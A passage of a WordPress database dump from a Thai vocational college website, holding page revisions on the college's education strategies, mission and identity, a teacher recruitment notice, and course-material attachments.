โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</h4>\r\n<h4>1. พัฒนาครูและบุคลากรอาชีวศึกษา</h4>\r\n<h4>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</h4>\r\n<h4>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</h4>\r\n<h4>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</h4>\r\n<h4>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</h4>\r\n<h4>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</h4>\r\n<h4>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</h4>\r\n<h4>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</h4>\r\n<h4>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</h4>\r\n \r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></h3>\r\n<h4>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</h4>\r\n<h4>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</h4>\r\n<h4>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</h4>\r\n<h4>3. พัฒนาฐานข้อมูลความร่วมมือ</h4>\r\n<h4>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</h4>\r\n<h4>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></h3>\r\n<h4>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</h4>\r\n<h4>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</h4>\r\n<h4>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</h4>\r\n<h4>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</h4>\r\n<h4>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</h4>\r\n<h4>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</h4>\r\n<h4>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</h4>\r\n<h4>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</h4>\r\n<h4>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</h4>\r\n<h4>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</h4>\r\n<h4>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></h3>\r\n<h4>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</h4>\r\n<h4>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</h4>\r\n<h4>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</h4>\r\n<h4>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</h4>\r\n<h4>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></h3>\r\n<h4>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</h4>\r\n<h4>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</h4>\r\n<h4>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</h4>\r\n<h4>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></h3>\r\n<h4>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</h4>\r\n<h4>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</h4>\r\n<h4>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</h4>\r\n<h4>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</h4>\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-06-19 13:43:25', '2018-06-19 06:43:25', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0),
(3103, 3, '2018-06-19 13:46:59', '2018-06-19 06:46:59', '<img class=\"aligncenter wp-image-1099 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-06-07.jpg\" alt=\"\" width=\"815\" height=\"607\" />\r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'พันธกิจ', '', 'inherit', 'closed', 'closed', '', '1098-autosave-v1', '', '', '2018-06-19 13:46:59', '2018-06-19 06:46:59', '', 1098, 'http://www.technicrayong.ac.th/1098-autosave-v1/', 0, 'revision', '', 0),
(3104, 3, '2018-06-19 13:46:50', '2018-06-19 06:46:50', '<img class=\"aligncenter wp-image-1099 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-06-07.jpg\" alt=\"\" width=\"815\" height=\"607\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'พันธกิจ', '', 'inherit', 'closed', 'closed', '', '1098-revision-v1', '', '', '2018-06-19 13:46:50', '2018-06-19 06:46:50', '', 1098, 'http://www.technicrayong.ac.th/1098-revision-v1/', 0, 'revision', '', 0),
(3105, 3, '2018-06-19 13:49:53', '2018-06-19 06:49:53', '<img class=\"aligncenter wp-image-1104 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-33-35.jpg\" alt=\"\" width=\"804\" height=\"600\" />\r\n\r\n<a href=\"/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'ปรัชญา', '', 'inherit', 'closed', 'closed', '', '1103-autosave-v1', '', '', '2018-06-19 13:49:53', '2018-06-19 06:49:53', '', 1103, 'http://www.technicrayong.ac.th/1103-autosave-v1/', 0, 'revision', '', 0),
(3106, 3, '2018-06-19 13:49:39', '2018-06-19 06:49:39', '<img class=\"aligncenter wp-image-1104 size-full\" src=\"/wp-content/uploads/2018/02/16-2-2561-10-33-35.jpg\" alt=\"\" width=\"804\" height=\"600\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'ปรัชญา', '', 'inherit', 'closed', 'closed', '', '1103-revision-v1', '', '', '2018-06-19 13:49:39', '2018-06-19 06:49:39', '', 1103, 'http://www.technicrayong.ac.th/1103-revision-v1/', 0, 'revision', '', 0),
(3107, 3, '2018-06-19 13:51:52', '2018-06-19 06:51:52', '<img class=\"aligncenter wp-image-1193 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-9-35-41.jpg\" alt=\"\" width=\"829\" height=\"617\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>', 'เอกลักษณ์', '', 'inherit', 'closed', 'closed', '', '1109-revision-v1', '', '', '2018-06-19 13:51:52', '2018-06-19 06:51:52', '', 1109, 'http://www.technicrayong.ac.th/1109-revision-v1/', 0, 'revision', '', 0),
(3108, 3, '2018-06-19 13:54:13', '2018-06-19 06:54:13', '<img class=\"aligncenter wp-image-1169\" src=\"/wp-content/uploads/2018/02/16-2-2561-16-17-21-300x179.jpg\" alt=\"\" width=\"1200\" height=\"716\" />\r\n\r\n<img class=\"aligncenter wp-image-1198 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-48-21.jpg\" alt=\"\" width=\"517\" height=\"96\" />\r\n\r\n<img class=\"wp-image-1197 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-10-41-04.jpg\" alt=\"\" width=\"822\" height=\"614\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n \r\n\r\n ', 'อัตลักษณ์', '', 'inherit', 'closed', 'closed', '', '1167-revision-v1', '', '', '2018-06-19 13:54:13', '2018-06-19 06:54:13', '', 1167, 'http://www.technicrayong.ac.th/1167-revision-v1/', 0, 'revision', '', 0),
(3111, 3, '2018-06-19 14:13:16', '2018-06-19 07:13:16', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 5 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-5', '', '', '2018-06-19 14:13:16', '2018-06-19 07:13:16', '', 0, 'http://www.technicrayong.ac.th/?p=3111', 394, 'post', '', 0),
(3112, 3, '2018-06-19 14:12:51', '2018-06-19 07:12:51', '', 'รับสมัครครูอัตราจ้าง 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-5-%e0%b8%ad', '', '', '2018-06-19 14:12:51', '2018-06-19 07:12:51', '', 3111, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รับสมัครครูอัตราจ้าง-5-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(3113, 3, '2018-06-19 14:13:16', '2018-06-19 07:13:16', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '3111-revision-v1', '', '', '2018-06-19 14:13:16', '2018-06-19 07:13:16', '', 3111, 'http://www.technicrayong.ac.th/3111-revision-v1/', 0, 'revision', '', 0),
(3114, 3, '2018-06-19 14:13:42', '2018-06-19 07:13:42', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-5-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว (ครูอัตราจ้าง) จำนวน 5 อัตรา', '', 'inherit', 'closed', 'closed', '', '3111-autosave-v1', '', '', '2018-06-19 14:13:42', '2018-06-19 07:13:42', '', 3111, 'http://www.technicrayong.ac.th/3111-autosave-v1/', 0, 'revision', '', 0),
(3116, 3, '2018-06-19 14:24:17', '2018-06-19 07:24:17', '', '6-18-2018 2-23-05 PM', '', 'inherit', 'closed', 'closed', '', '6-18-2018-2-23-05-pm', '', '', '2018-06-19 14:24:17', '2018-06-19 07:24:17', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-18-2018-2-23-05-PM.png', 0, 'attachment', 'image/png', 0),
(3118, 3, '2018-06-19 14:27:05', '2018-06-19 07:27:05', '<img class=\"aligncenter wp-image-3116 size-full\" src=\"/wp-content/uploads/2018/01/6-18-2018-2-23-05-PM.png\" alt=\"\" width=\"1106\" height=\"714\" />', 'ประชาสัมพันธ์!! ห้องสมุดจัดกิจกรรมการแข่งขันเปิดพจนานุกรมไทยราชบัณฑิตยสถาน', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%aa%e0%b8%a1%e0%b8%b8%e0%b8%94', '', '', '2018-06-19 14:27:05', '2018-06-19 07:27:05', '', 0, 'http://www.technicrayong.ac.th/?p=3118', 393, 'post', '', 0),
(3119, 3, '2018-06-19 14:27:05', '2018-06-19 07:27:05', '<img class=\"aligncenter wp-image-3116 size-full\" src=\"/wp-content/uploads/2018/01/6-18-2018-2-23-05-PM.png\" alt=\"\" width=\"1106\" height=\"714\" />', 'ประชาสัมพันธ์!! ห้องสมุดจัดกิจกรรมการแข่งขันเปิดพจนานุกรมไทยราชบัณฑิตยสถาน', '', 'inherit', 'closed', 'closed', '', '3118-revision-v1', '', '', '2018-06-19 14:27:05', '2018-06-19 07:27:05', '', 3118, 'http://www.technicrayong.ac.th/3118-revision-v1/', 0, 'revision', '', 0),
(3120, 3, '2018-06-19 14:27:15', '2018-06-19 07:27:15', '<img class=\"aligncenter wp-image-3116 size-full\" src=\"/wp-content/uploads/2018/01/6-18-2018-2-23-05-PM.png\" alt=\"\" width=\"1106\" height=\"714\" />', 'ประชาสัมพันธ์!! ห้องสมุดจัดกิจกรรมการแข่งขันเปิดพจนานุกรมไทยราชบัณฑิตยสถาน', '', 'inherit', 'closed', 'closed', '', '3118-autosave-v1', '', '', '2018-06-19 14:27:15', '2018-06-19 07:27:15', '', 3118, 'http://www.technicrayong.ac.th/3118-autosave-v1/', 0, 'revision', '', 0),
(3122, 3, '2018-06-20 12:20:22', '2018-06-20 05:20:22', '', 'แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%a3%e0%b8%b9%e0%b9%89-%e0%b8%a7%e0%b8%b4', '', '', '2018-06-20 12:20:22', '2018-06-20 05:20:22', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf', 0, 'attachment', 'application/pdf', 0),
(3123, 3, '2018-06-20 12:23:09', '2018-06-20 05:23:09', '', 'สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b9%81%e0%b8%a1%e0%b9%88', '', '', '2018-06-20 12:23:09', '2018-06-20 05:23:09', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf', 0, 'attachment', 'application/pdf', 0),
(3124, 3, '2018-06-20 12:23:47', '2018-06-20 05:23:47', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2645 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"477\" height=\"344\" />\r\n<h4><strong><a href=\"/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf\">แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม</a></strong></h4>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf\">สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004</a></strong></span></h4>\r\n<h4><span 